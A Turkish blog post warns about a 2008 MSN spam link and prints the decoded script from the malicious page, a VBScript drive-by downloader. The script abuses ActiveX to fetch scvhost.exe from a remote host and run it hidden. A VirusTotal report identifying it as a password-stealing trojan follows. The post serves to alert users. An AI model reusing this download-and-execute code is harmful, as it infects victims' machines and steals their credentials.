Msn üzerinden yayılan virüs dalgası. | bildirgec.org

Bu gün bana msn üzerinden bir link gönderildi
mesajın içeriği ise aşağıdaki gibiydi

Ulkemize destek icin oy kullanalim. Es gecme lütfen.
http://www.francenatural.fr/turkey/

siteye girdiğimizde bizden Microsoft - Data Access activex nesnesine onay vermemiz isteniyordu. Buraya kadar herşey düzgün ve normal duruyordu ancak dikkatimi çeken şey sitenin fransa kökenli ve Türkçe olmasıydı. Sitenin anasayfasına baktığımda ise şarap tanıtım sitesiydi.

hemen huylanıp geri döndüm ve sayfa kodlarını inceledim.. ama sayfa kodları javascript encode ile kodlanmış şifreli durumdaydı. Kodları 4 sefer encode yaparak şifrelemiş olmalarına rağmen decode yaptım ve html kodlarını incelediğimde

function CC_noErrors() {
return true;
}

window.onerror = CC_noErrors;

on error resume next
dl = “http://www.francenatural.fr/scvhost.exe“
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,”")
a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,”")
S.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fname1=”scvhost.exe”
set F = df.createobject(”Scripting.FileSystemObject”,”")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(”Shell.Application”,”")
Q.ShellExecute fname1,”",”",”open”,0

kodlarını gördüm. bahsi geçen linkten scvhost.exe dosyasını çektim ve antivirüs ile kontrol ettim ancak virüs yoktu… kendi sitem üzerindeki online tarama ile kontrol ettiğimde ise aşağıdaki rapora ulaştım.

File scvhost.exe received on 03.25.2008 13:13:31 (CET)
Current status: Loading … queued waiting scanning finished NOT FOUND STOPPED

Result: 14/32 (43.75%)

Loading server information…

Your file is queued in position: 4.
Estimated start time is between 47 and 68 seconds.
Do not close the window until scan is complete.

The scanner that was processing your file is stopped at this moment, we are going to wait a few seconds to try to recover your result.
If you are waiting for more than five minutes you have to resend your file.

Your file is being scanned by VirusTotal in this moment,
results will be shown as they’re generated.
Antivirus Version Last Update Result
AhnLab-V3 2008.3.25.0 2008.03.25 -
AntiVir 7.6.0.75 2008.03.25 -
Authentium 4.93.8 2008.03.25 -
Avast 4.7.1098.0 2008.03.24 -
AVG 7.5.0.516 2008.03.25 Generic9.BBRO
BitDefender 7.2 2008.03.25 -
CAT-QuickHeal 9.50 2008.03.24 Backdoor.Sdbot.509
ClamAV 0.92.1 2008.03.25 Trojan.LdPinch-1835
DrWeb 4.44.0.09170 2008.03.25 -
eSafe 7.0.15.0 2008.03.18 -
eTrust-Vet 31.3.5641 2008.03.25 -
Ewido 4.0 2008.03.25 Trojan.Buzus.hs
F-Prot 4.4.2.54 2008.03.24 -
F-Secure 6.70.13260.0 2008.03.25 W32/Malware
FileAdvisor 1 2008.03.25 -
Fortinet 3.14.0.0 2008.03.25 W32/LdPinch.GHI!tr.pws
Ikarus T3.1.1.20 2008.03.25 Trojan.Win32.Buzus.gv
Kaspersky 7.0.0.125 2008.03.25 Trojan-PSW.Win32.LdPinch.ghi
McAfee 5258 2008.03.24 -
Microsoft 1.3301 2008.03.25 VirTool:Win32/DelfInject.gen!X
NOD32v2 2970 2008.03.25 -
Norman 5.80.02 2008.03.20 W32/Malware.CBCD
Panda 9.0.0.4 2008.03.25 Suspicious file
Prevx1 V2 2008.03.25 Generic9.BBRO
Rising 20.37.02.00 2008.03.24 -
Sophos 4.27.0 2008.03.25 -
Sunbelt 3.0.978.0 2008.03.18 -
Symantec 10 2008.03.25 -
TheHacker 6.2.92.253 2008.03.25 Trojan/PSW.LdPinch.ghi
VBA32 3.12.6.3 2008.03.25 Trojan-PSW.Win32.LdPinch.ghi
VirusBuster 4.3.26:9 2008.03.24 -
Webwasher-Gateway 6.6.2 2008.03.25 -
Additional information
File size: 548437 bytes
MD5: 676f6872085b4a4b85927e39f7a8143f
SHA1: 801940ac4a736d980e00a037fd447b454f1c2701
PEiD: -
Prevx info: http://info.prevx.com/aboutprogramtext.asp?PX5=63CAAA4555C97D6E5E6F0860F57EE200C4CAD324

Görüldüğü gibi virüs şifrelenerek gizlenmiş TROJAN virüsü içeriyordu.

Lütfen dikkat edelim ve bu tür tuzaklara düşmeyelim

Burak ŞEKERCİOĞLU